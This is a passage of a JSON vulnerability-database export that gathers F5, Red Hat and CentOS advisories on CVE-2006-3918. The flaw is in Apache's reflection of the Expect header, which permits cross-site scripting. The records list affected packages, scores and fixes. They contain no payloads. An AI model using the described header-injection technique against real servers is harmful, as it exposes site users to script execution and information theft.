locations:\n\n<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3918>\n\n<http://httpd.apache.org/security/vulnerabilities_13.html>\n\n<http://seclists.org/bugtraq/2006/May/0440.html>\n\n<http://www.securityfocus.com/archive/1/441014/30/0/>\n\nF5 Product Development tracked this issue as CR47467 for BIG-IP, and it was fixed in BIG-IP 9.4.0. For information about upgrading, refer to the BIG-IP [LTM](<https://support.f5.com/content/kb/en-us/products/big-ip_ltm.html>), [GTM](<https://support.f5.com/content/kb/en-us/products/big-ip_gtm.html>), [ASM](<https://support.f5.com/content/kb/en-us/products/big-ip_asm.html>), [Link Controller](<https://support.f5.com/content/kb/en-us/products/lc_9_x.html>), or [WebAccelerator](<https://support.f5.com/content/kb/en-us/products/wa.html>) release notes.\n\nF5 Product Development tracked this issue as CR67295 for FirePass, and it was fixed in 5.5.2 and 6.0.1. For information about upgrading, refer to the [FirePass](<https://support.f5.com/content/kb/en-us/products/firepass.html>) release notes. \n \nAdditionally, this issue was fixed in cumulative hotfix 600-3 for FirePass software. You may download this hotfix or later versions of the cumulative hotfix from the F5 [Downloads](<http://downloads.f5.com/>) site. \n \nFor information about the F5 hotfix policy, refer to [K4918: Overview of F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>).\n\nFor instructions about installing a FirePass hotfix, refer to [K3430: Installing hotfixes](<https://support.f5.com/csp/article/K3430>).\n", "reporter": "f5", "published": "2007-05-17T04:00:00", "title": "Apache HTTP Expect header handling", "type": "f5", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "affectedSoftware": [{"name": "BIG-IP ASM", "version": "9.2.5", "operator": "le"}, {"name": "BIG-IP Link Controller", "version": "9.2.5", "operator": "le"}, {"name": "FirePass", "version": "6.0.0", "operator": "le"}, {"name": "FirePass", "version": "5.5.1", "operator": "le"}, {"name": "BIG-IP LTM", "version": "9.2.5", "operator": "le"}, {"name": "BIG-IP GTM", "version": "9.2.5", "operator": "le"}], "bulletinFamily": "software", "cvelist": ["CVE-2006-3918"], "modified": "2016-01-09T02:24:00", "id": "F5:K6669", "href": "https://support.f5.com/csp/article/K6669", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2016-09-26T17:23:04", "references": [], "edition": 1, "description": "The vulnerability exists in the Apache web server, which is used by FirePass. Apache will not sanitize the contents of the HTTP Expect header when receiving an HTTP request. Instead, the contents of the Expect header will be returned in a successful HTTP response. This permits executable code such as JavaScript that is inserted into the HTTP Expect header to be executed by the browser in the security context of the web site whose page was returned. A cross-site scripting attack may be permitted as a result, which can disclose sensitive information or perform other malicious actions.\n\nThis vulnerability is difficult to exploit because insertion of code into an HTTP header would generally require an attacker to have exploited another, more serious vulnerability in the browser. It is not sufficient to create a hyperlink with exploit code embedded in the URL parameters, as is the case with the standard cross-site scripting technique. Although ActiveX and the ActionScript language available in Adobe/Macromedia Flash have the capability to craft HTTP requests, including headers and proof-of-concepts, the constraint of having to first download a malicious ActiveX control or Flash file makes this vulnerability unlikely to be exploited.\n\nInformation about this advisory is available at the following locations:\n\n<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3918>\n\n<http://httpd.apache.org/security/vulnerabilities_13.html>\n\n<http://seclists.org/bugtraq/2006/May/0440.html>\n\n<http://www.securityfocus.com/archive/1/441014/30/0/>\n\nF5 Product Development tracked this issue as CR47467 for BIG-IP, and it was fixed in BIG-IP 9.4.0. For information about upgrading, refer to the BIG-IP LTM, GTM, ASM, Link Controller, or WebAccelerator release notes.\n\nF5 Product Development tracked this issue as CR67295 for FirePass, and it was fixed in 5.5.2 and 6.0.1. For information about upgrading, refer to the FirePass release notes. \n \nAdditionally, this issue was fixed in cumulative hotfix 600-3 for FirePass software. You may download this hotfix or later versions of the cumulative hotfix from the F5 [Downloads](<http://downloads.f5.com/>) site. \n \nFor information about the F5 hotfix policy, refer to SOL4918: Overview of F5 critical issue hotfix policy.\n\nFor instructions about installing a FirePass hotfix, refer to SOL3430: Installing hotfixes.\n", "reporter": "f5", "published": "2007-05-16T00:00:00", "title": "SOL6669 - Apache HTTP Expect header handling", "type": "f5", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "BIG-IP ASM", "version": "9.2.5", "operator": "le"}, {"name": "BIG-IP Link Controller", "version": "9.2.5", "operator": "le"}, {"name": "FirePass", "version": "6.0.0", "operator": "le"}, {"name": "FirePass", "version": "5.5.1", "operator": "le"}, {"name": "BIG-IP LTM", "version": "9.2.5", "operator": "le"}, {"name": "BIG-IP GTM", "version": "9.2.5", "operator": "le"}], "cvelist": ["CVE-2006-3918"], "modified": "2013-03-19T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/6000/600/sol6669.html", "id": "SOL6669", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "redhat": [{"lastseen": "2018-03-28T01:01:41", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "any", "packageVersion": "1.3.27-11.ent", "arch": "ia64", "packageFilename": "apache-devel-1.3.27-11.ent.ia64.rpm", "packageName": "apache-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "1.3.27-11.ent", "arch": "ia64", "packageFilename": "apache-manual-1.3.27-11.ent.ia64.rpm", "packageName": "apache-manual", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "1.3.27-11.ent", "arch": "i386", "packageFilename": "apache-manual-1.3.27-11.ent.i386.rpm", "packageName": "apache-manual", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "1.3.27-11.ent", "arch": "i386", "packageFilename": "apache-1.3.27-11.ent.i386.rpm", "packageName": "apache", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "1.3.27-11.ent", "arch": "ia64", "packageFilename": "apache-1.3.27-11.ent.ia64.rpm", "packageName": "apache", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "1.3.27-11.ent", "arch": "i386", "packageFilename": "apache-devel-1.3.27-11.ent.i386.rpm", "packageName": "apache-devel", "operator": "lt"}], "description": "The Apache HTTP Server is a popular Web server available for free. \r\n\r\nA bug was found in Apache where an invalid Expect header sent to the server\r\nwas returned to the user in an unescaped error message. This could\r\nallow an attacker to perform a cross-site scripting attack if a victim was\r\ntricked into connecting to a site and sending a carefully crafted Expect\r\nheader. (CVE-2006-3918)\r\n\r\nWhile a web browser cannot be forced to send an arbitrary Expect header by\r\na third-party attacker, it was recently discovered that certain versions of\r\nthe Flash plugin can manipulate request headers. If users running such\r\nversions can be persuaded to load a web page with a malicious Flash applet,\r\na cross-site scripting attack against the server may be possible.\r\n\r\nUsers of Apache should upgrade to these updated packages, which contain a\r\nbackported patch to correct this issue.", "reporter": "RedHat", "published": "2006-08-08T04:00:00", "type": "redhat", "title": "(RHSA-2006:0618) apache security update", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "bulletinFamily": "unix", "cvelist": ["CVE-2006-3918"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-03-14T19:27:28", "id": "RHSA-2006:0618", "href": "https://access.redhat.com/errata/RHSA-2006:0618", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-09-09T07:20:39", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "any", "packageVersion": "2.0.52-28.ent", "arch": "i386", "packageFilename": "httpd-2.0.52-28.ent.i386.rpm", "packageName": "httpd", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "2.0.52-28.ent", "arch": "i386", "packageFilename": "httpd-devel-2.0.52-28.ent.i386.rpm", "packageName": "httpd-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "2.0.52-28.ent", "arch": "i386", "packageFilename": "httpd-manual-2.0.52-28.ent.i386.rpm", "packageName": "httpd-manual", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "2.0.52-28.ent", "arch": "i386", "packageFilename": "httpd-suexec-2.0.52-28.ent.i386.rpm", "packageName": "httpd-suexec", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "2.0.52-28.ent", "arch": "i386", "packageFilename": "mod_ssl-2.0.52-28.ent.i386.rpm", "packageName": "mod_ssl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "2.0.52-28.ent", "arch": "src", "packageFilename": "httpd-2.0.52-28.ent.src.rpm", "packageName": "httpd", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "2.0.52-28.ent", "arch": "ia64", "packageFilename": "httpd-2.0.52-28.ent.ia64.rpm", "packageName": "httpd", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "2.0.52-28.ent", "arch": "ia64", "packageFilename": "httpd-devel-2.0.52-28.ent.ia64.rpm", "packageName": "httpd-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "2.0.52-28.ent", "arch": "ia64", "packageFilename": "httpd-manual-2.0.52-28.ent.ia64.rpm", "packageName": "httpd-manual", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "2.0.52-28.ent", "arch": "ia64", "packageFilename": "httpd-suexec-2.0.52-28.ent.ia64.rpm", "packageName": "httpd-suexec", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "2.0.52-28.ent", "arch": "ia64", "packageFilename": "mod_ssl-2.0.52-28.ent.ia64.rpm", "packageName": "mod_ssl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "2.0.52-28.ent", "arch": "x86_64", "packageFilename": "httpd-2.0.52-28.ent.x86_64.rpm", "packageName": "httpd", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "2.0.52-28.ent", "arch": "x86_64", "packageFilename": "httpd-devel-2.0.52-28.ent.x86_64.rpm", "packageName": "httpd-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "2.0.52-28.ent", "arch": "x86_64", "packageFilename": "httpd-manual-2.0.52-28.ent.x86_64.rpm", "packageName": "httpd-manual", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "2.0.52-28.ent", "arch": "x86_64", "packageFilename": "httpd-suexec-2.0.52-28.ent.x86_64.rpm", "packageName": "httpd-suexec", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "2.0.52-28.ent", "arch": "x86_64", "packageFilename": "mod_ssl-2.0.52-28.ent.x86_64.rpm", "packageName": "mod_ssl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "2.0.52-28.ent", "arch": "ppc", "packageFilename": "httpd-2.0.52-28.ent.ppc.rpm", "packageName": "httpd", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "2.0.52-28.ent", "arch": "ppc", "packageFilename": "httpd-devel-2.0.52-28.ent.ppc.rpm", "packageName": "httpd-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "2.0.52-28.ent", "arch": "ppc", "packageFilename": "httpd-manual-2.0.52-28.ent.ppc.rpm", "packageName": "httpd-manual", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "2.0.52-28.ent", "arch": "ppc", "packageFilename": "httpd-suexec-2.0.52-28.ent.ppc.rpm", "packageName": "httpd-suexec", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "2.0.52-28.ent", "arch": "ppc", "packageFilename": "mod_ssl-2.0.52-28.ent.ppc.rpm", "packageName": "mod_ssl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "2.0.52-28.ent", "arch": "s390", "packageFilename": "httpd-2.0.52-28.ent.s390.rpm", "packageName": "httpd", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "2.0.52-28.ent", "arch": "s390", "packageFilename": "httpd-devel-2.0.52-28.ent.s390.rpm", "packageName": "httpd-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "2.0.52-28.ent", "arch": "s390", "packageFilename": "httpd-manual-2.0.52-28.ent.s390.rpm", "packageName": "httpd-manual", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "2.0.52-28.ent", "arch": "s390", "packageFilename": "httpd-suexec-2.0.52-28.ent.s390.rpm", "packageName": "httpd-suexec", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "2.0.52-28.ent", "arch": "s390", "packageFilename": "mod_ssl-2.0.52-28.ent.s390.rpm", "packageName": "mod_ssl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "2.0.52-28.ent", "arch": "s390x", "packageFilename": "httpd-2.0.52-28.ent.s390x.rpm", "packageName": "httpd", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "2.0.52-28.ent", "arch": "s390x", "packageFilename": "httpd-devel-2.0.52-28.ent.s390x.rpm", "packageName": "httpd-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "2.0.52-28.ent", "arch": "s390x", "packageFilename": "httpd-manual-2.0.52-28.ent.s390x.rpm", "packageName": "httpd-manual", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "2.0.52-28.ent", "arch": "s390x", "packageFilename": "httpd-suexec-2.0.52-28.ent.s390x.rpm", "packageName": "httpd-suexec", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "2.0.52-28.ent", "arch": "s390x", "packageFilename": "mod_ssl-2.0.52-28.ent.s390x.rpm", "packageName": "mod_ssl", "operator": "lt"}], "description": "The Apache HTTP Server is a popular Web server available for free.\r\n\r\nA bug was found in Apache where an invalid Expect header sent to the server\r\nwas returned to the user in an unescaped error message. This could\r\nallow an attacker to perform a cross-site scripting attack if a victim was\r\ntricked into connecting to a site and sending a carefully crafted Expect\r\nheader. (CVE-2006-3918)\r\n\r\nWhile a web browser cannot be forced to send an arbitrary Expect\r\nheader by a third-party attacker, it was recently discovered that\r\ncertain versions of the Flash plugin can manipulate request headers.\r\nIf users running such versions can be persuaded to load a web page\r\nwith a malicious Flash applet, a cross-site scripting attack against\r\nthe server may be possible.\r\n\r\nOn Red Hat Enterprise Linux 3 and 4 systems, due to an unrelated issue in\r\nthe handling of malformed Expect headers, the page produced by the\r\ncross-site scripting attack will only be returned after a timeout expires\r\n(2-5 minutes by default) if not first canceled by the user.\r\n\r\nUsers of httpd should update to these erratum packages, which contain a\r\nbackported patch to correct these issues.", "reporter": "RedHat", "published": "2006-08-10T04:00:00", "type": "redhat", "title": "(RHSA-2006:0619) httpd security update", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "bulletinFamily": "unix", "cvelist": ["CVE-2006-3918"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2017-09-08T12:18:13", "id": "RHSA-2006:0619", "href": "https://access.redhat.com/errata/RHSA-2006:0619", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "centos": [{"lastseen": "2017-10-12T14:45:44", "references": ["https://rhn.redhat.com/errata/RHSA-2006-0619.html", "http://pgp.mit.edu:11371/pks/lookup?op=get&search=0xBEFA581B"], "affectedPackage": [{"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.0.52-28.ent.centos4", "arch": "any", "packageName": "httpd", "packageFilename": "httpd-2.0.52-28.ent.centos4.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.0.52-28.ent.centos4", "arch": "any", "packageName": "httpd", "packageFilename": "httpd-2.0.52-28.ent.centos4.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.0.52-28.ent.centos4", "arch": "x86_64", "packageName": "httpd-manual", "packageFilename": "httpd-manual-2.0.52-28.ent.centos4.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "2.0.46-61.ent.centos3", "arch": "x86_64", "packageName": "mod_ssl", "packageFilename": "mod_ssl-2.0.46-61.ent.centos3.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.0.52-28.ent.centos4", "arch": "x86_64", "packageName": "mod_ssl", "packageFilename": "mod_ssl-2.0.52-28.ent.centos4.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "2.0.46-61.ent.centos3", "arch": "x86_64", "packageName": "httpd", "packageFilename": "httpd-2.0.46-61.ent.centos3.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.0.52-28.ent.centos4", "arch": "x86_64", "packageName": "httpd", "packageFilename": "httpd-2.0.52-28.ent.centos4.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "2.0.46-61.ent.centos3", "arch": "any", "packageName": "httpd", "packageFilename": "httpd-2.0.46-61.ent.centos3.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "2.0.46-61.ent.centos3", "arch": "any", "packageName": "httpd", "packageFilename": "httpd-2.0.46-61.ent.centos3.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.0.52-28.ent.centos4", "arch": "x86_64", "packageName": "httpd-devel", "packageFilename": "httpd-devel-2.0.52-28.ent.centos4.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "2.0.46-61.ent.centos3", "arch": "i386", "packageName": "httpd-devel", "packageFilename": "httpd-devel-2.0.46-61.ent.centos3.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.0.52-28.ent.centos4", "arch": "i366", "packageName": "httpd-suexec", "packageFilename": "httpd-suexec-2.0.52-28.ent.centos4.i366.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "2.0.46-61.ent.centos3", "arch": "i386", "packageName": "httpd", "packageFilename": "httpd-2.0.46-61.ent.centos3.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.0.52-28.ent.centos4", "arch": "i386", "packageName": "mod_ssl", "packageFilename": "mod_ssl-2.0.52-28.ent.centos4.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.0.52-28.ent.centos4", "arch": "x86_64", "packageName": "httpd-suexec", "packageFilename": "httpd-suexec-2.0.52-28.ent.centos4.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "2.0.46-61.ent.centos3", "arch": "x86_64", "packageName": "httpd-devel", "packageFilename": "httpd-devel-2.0.46-61.ent.centos3.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.0.52-28.ent.centos4", "arch": "i386", "packageName": "httpd", "packageFilename": "httpd-2.0.52-28.ent.centos4.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.0.52-28.ent.centos4", "arch": "i386", "packageName": "httpd-manual", "packageFilename": "httpd-manual-2.0.52-28.ent.centos4.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.0.52-28.ent.centos4", "arch": "i386", "packageName": "httpd-devel", "packageFilename": "httpd-devel-2.0.52-28.ent.centos4.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "2.0.46-61.ent.centos3", "arch": "i386", "packageName": "mod_ssl", "packageFilename": "mod_ssl-2.0.46-61.ent.centos3.i386.rpm", "operator": "lt"}], "description": "**CentOS Errata and Security Advisory** CESA-2006:0619\n\n\nThe Apache HTTP Server is a popular Web server available for free.\r\n\r\nA bug was found in Apache where an invalid Expect header sent to the server\r\nwas returned to the user in an unescaped error message. This could\r\nallow an attacker to perform a cross-site scripting attack if a victim was\r\ntricked into connecting to a site and sending a carefully crafted Expect\r\nheader. (CVE-2006-3918)\r\n\r\nWhile a web browser cannot be forced to send an arbitrary Expect\r\nheader by a third-party attacker, it was recently discovered that\r\ncertain versions of the Flash plugin can manipulate request headers.\r\nIf users running such versions can be persuaded to load a web page\r\nwith a malicious Flash applet, a cross-site scripting attack against\r\nthe server may be possible.\r\n\r\nOn Red Hat Enterprise Linux 3 and 4 systems, due to an unrelated issue in\r\nthe handling of malformed Expect headers, the page produced by the\r\ncross-site scripting attack will only be returned after a timeout expires\r\n(2-5 minutes by default) if not first canceled by the user.\r\n\r\nUsers of httpd should update to these erratum packages, which contain a\r\nbackported patch to correct these issues.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2006-August/013135.html\nhttp://lists.centos.org/pipermail/centos-announce/2006-August/013136.html\nhttp://lists.centos.org/pipermail/centos-announce/2006-August/013143.html\nhttp://lists.centos.org/pipermail/centos-announce/2006-August/013144.html\n\n**Affected packages:**\nhttpd\nhttpd-devel\nhttpd-manual\nhttpd-suexec\nmod_ssl\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2006-0619.html", "edition": 2, "reporter": "CentOS Project", "published": "2006-08-10T22:42:31", "title": "httpd, mod_ssl security update", "type": "centos", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "bulletinFamily": "unix", "cvelist": ["CVE-2006-3918"], "modified": "2006-08-24T00:08:07", "href": "http://lists.centos.org/pipermail/centos-announce/2006-August/013135.html", "id": "CESA-2006:0619", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-01-25T21:02:01", "references": ["https://rhn.redhat.com/errata/rh21as-errata.html", "http://www.ict.swin.edu.au/staff/jnewbigin"], "affectedPackage": [{"OS": "CentOS", "OSVersion": "2", "packageVersion": "1.3.27-11.ent.c2.1", "packageFilename": "apache-1.3.27-11.ent.c2.1.i386.rpm", "packageName": "apache", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "2", "packageVersion": "1.3.27-11.ent.c2.1", "packageFilename": "apache-manual-1.3.27-11.ent.c2.1.i386.rpm", "packageName": "apache-manual", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "2", "packageVersion": "1.3.27-11.ent.c2.1", "packageFilename": "apache-devel-1.3.27-11.ent.c2.1.i386.rpm", "packageName": "apache-devel", "arch": "i386", "operator": "lt"}], "description": "**CentOS Errata and Security Advisory** CESA-2006:0618-01\n\n\nThe Apache HTTP Server is a popular Web server available for free. \r\n\r\nA bug was found in Apache where an invalid Expect header sent to the server\r\nwas returned to the user in an unescaped error message. This could\r\nallow an attacker to perform a cross-site scripting attack if a victim was\r\ntricked into connecting to a site and sending a carefully crafted Expect\r\nheader. (CVE-2006-3918)\r\n\r\nWhile a web browser cannot be forced to send an arbitrary Expect header by\r\na third-party attacker, it was recently discovered that certain versions of\r\nthe Flash plugin can manipulate request headers. If users running such\r\nversions can be persuaded to load a web page with a malicious Flash applet,\r\na cross-site scripting attack against the server may be possible.\r\n\r\nUsers of Apache should upgrade to these updated packages, which contain a\r\nbackported patch to correct this issue.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2006-August/013128.html\n\n**Affected packages:**\napache\napache-devel\napache-manual\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/rh21as-errata.html", "edition": 3, "reporter": "CentOS Project", "published": "2006-08-08T23:33:33", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "title": "apache security update", "type": "centos", "bulletinFamily": "unix", "cvelist": ["CVE-2006-3918"], "modified": "2006-08-08T23:33:33", "href": "http://lists.centos.org/pipermail/centos-announce/2006-August/013128.html", "id": "CESA-2006:0618-01", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-01-25T21:01:37", "references": ["http://pasi.pirhonen.eu/", "https://rhn.redhat.com/errata/RHSA-2006-0618.html"], "affectedPackage": [{"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.0.52-28.ent.centos4", "packageFilename": "httpd-suexec-2.0.52-28.ent.centos4.s390.rpm", "packageName": "httpd-suexec", "arch": "s390", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.0.52-28.ent.centos4", "packageFilename": "httpd-suexec-2.0.52-28.ent.centos4.alpha.rpm", "packageName": "httpd-suexec", "arch": "alpha", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.0.52-28.ent.centos4", "packageFilename": "httpd-devel-2.0.52-28.ent.centos4.s390x.rpm", "packageName": "httpd-devel", "arch": "s390x", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.0.52-28.ent.centos4", "packageFilename": "httpd-devel-2.0.52-28.ent.centos4.s390.rpm", "packageName": "httpd-devel", "arch": "s390", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.0.52-28.ent.centos4", "packageFilename": "httpd-2.0.52-28.ent.centos4.s390x.rpm", "packageName": "httpd", "arch": "s390x", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.0.52-28.ent.centos4", "packageFilename": "httpd-suexec-2.0.52-28.ent.centos4.s390x.rpm", "packageName": "httpd-suexec", "arch": "s390x", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.0.52-28.ent.centos4", "packageFilename": "httpd-suexec-2.0.52-28.ent.centos4.ia64.rpm", "packageName": "httpd-suexec", "arch": "ia64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.0.52-28.ent.centos4", "packageFilename": "mod_ssl-2.0.52-28.ent.centos4.ia64.rpm", "packageName": "mod_ssl", "arch": "ia64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.0.52-28.ent.centos4", "packageFilename": "httpd-2.0.52-28.ent.centos4.ia64.rpm", "packageName": "httpd", "arch": "ia64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.0.52-28.ent.centos4", "packageFilename": "httpd-devel-2.0.52-28.ent.centos4.ia64.rpm", "packageName": "httpd-devel", "arch": "ia64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.0.52-28.ent.centos4", "packageFilename": "httpd-manual-2.0.52-28.ent.centos4.ia64.rpm", "packageName": "httpd-manual", "arch": "ia64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.0.52-28.ent.centos4", "packageFilename": "httpd-devel-2.0.52-28.ent.centos4.alpha.rpm", "packageName": "httpd-devel", "arch": "alpha", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.0.52-28.ent.centos4", "packageFilename": "httpd-2.0.52-28.ent.centos4.alpha.rpm", "packageName": "httpd", "arch": "alpha", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.0.52-28.ent.centos4", "packageFilename": "httpd-2.0.52-28.ent.centos4.s390.rpm", "packageName": "httpd", "arch": "s390", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.0.52-28.ent.centos4", "packageFilename": "httpd-manual-2.0.52-28.ent.centos4.s390.rpm", "packageName": "httpd-manual", "arch": "s390", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.0.52-28.ent.centos4", "packageFilename": "httpd-manual-2.0.52-28.ent.centos4.alpha.rpm", "packageName": "httpd-manual", "arch": "alpha", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.0.52-28.ent.centos4", "packageFilename": "httpd-manual-2.0.52-28.ent.centos4.s390x.rpm", "packageName": "httpd-manual", "arch": "s390x", "operator": "lt"}], "description": "**CentOS Errata and Security Advisory** CESA-2006:0618\n\n\nThe Apache HTTP Server is a popular Web server available for free. \r\n\r\nA bug was found in Apache where an invalid Expect header sent to the server\r\nwas returned to the user in an unescaped error message. This could\r\nallow an attacker to perform a cross-site scripting attack if a victim was\r\ntricked into connecting to a site and sending a carefully crafted Expect\r\nheader. (CVE-2006-3918)\r\n\r\nWhile a web browser cannot be forced to send an arbitrary Expect header by\r\na third-party attacker, it was recently discovered that certain versions of\r\nthe Flash plugin can manipulate request headers. If users running such\r\nversions can be persuaded to load a web page with a malicious Flash applet,\r\na cross-site scripting attack against the server may be possible.\r\n\r\nUsers of Apache should upgrade to these updated packages, which contain a\r\nbackported patch to correct this issue.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2006-August/013163.html\nhttp://lists.centos.org/pipermail/centos-announce/2006-August/013164.html\nhttp://lists.centos.org/pipermail/centos-announce/2006-August/013165.html\n\n**Affected packages:**\nhttpd\nhttpd-devel\nhttpd-manual\nhttpd-suexec\nmod_ssl\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2006-0618.html", "edition": 4, "reporter": "CentOS Project", "published": "2006-08-24T16:29:11", "enchantments": {"score": {"vector": "NONE", "value": 